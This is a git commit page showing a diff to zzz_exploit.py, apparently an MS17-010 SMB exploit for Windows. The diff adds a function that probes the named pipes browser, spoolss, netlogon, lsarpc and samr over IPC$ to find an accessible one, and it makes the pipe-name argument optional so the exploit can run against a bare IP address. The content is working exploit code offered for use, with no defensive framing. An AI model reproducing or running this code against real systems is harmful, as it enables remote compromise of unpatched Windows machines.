bozhihouc/MS17-010
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

find named pipe if it is omitted

Browse Source
This commit is contained in:
worawit
2017-07-16 22:50:44 +07:00
parent 3a4b8183b3
commit 6f47613603
1 changed files with 26 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

29
zzz_exploit.py
View File

@@ -269,6 +269,22 @@ def wait_for_request_processed(conn):
# send echo is faster than sleep(0.05) when connection is very good # send echo is faster than sleep(0.05) when connection is very good
conn.send_echo('a') conn.send_echo('a')
def find_named_pipe(conn):
pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
found_pipe = None
for pipe in pipes:
try:
fid = conn.nt_create_andx(tid, pipe)
conn.close(tid, fid)
found_pipe = pipe
except smb.SessionError, e:
pass
conn.disconnect_tree(tid)
return found_pipe
special_mid = 0 special_mid = 0
extra_last_mid = 0 extra_last_mid = 0
@@ -769,6 +785,13 @@ def exploit(target, pipe_name):
print('This exploit does not support this target') print('This exploit does not support this target')
sys.exit() sys.exit()
if pipe_name is None:
pipe_name = find_named_pipe(conn)
if pipe_name is None:
print('Not found accessible named pipe')
return False
print('Using named pipe: '+pipe_name)
if not info['method'](conn, pipe_name, info): if not info['method'](conn, pipe_name, info):
return False return False
@@ -921,12 +944,12 @@ def service_exec(conn, cmd):
rpcsvc.disconnect() rpcsvc.disconnect()
if len(sys.argv) != 3: if len(sys.argv) < 2:
print("{} <ip> <pipe_name>".format(sys.argv[0])) print("{} <ip> [pipe_name]".format(sys.argv[0]))
sys.exit(1) sys.exit(1)
target = sys.argv[1] target = sys.argv[1]
pipe_name = sys.argv[2] pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
exploit(target, pipe_name) exploit(target, pipe_name)
print('Done') print('Done')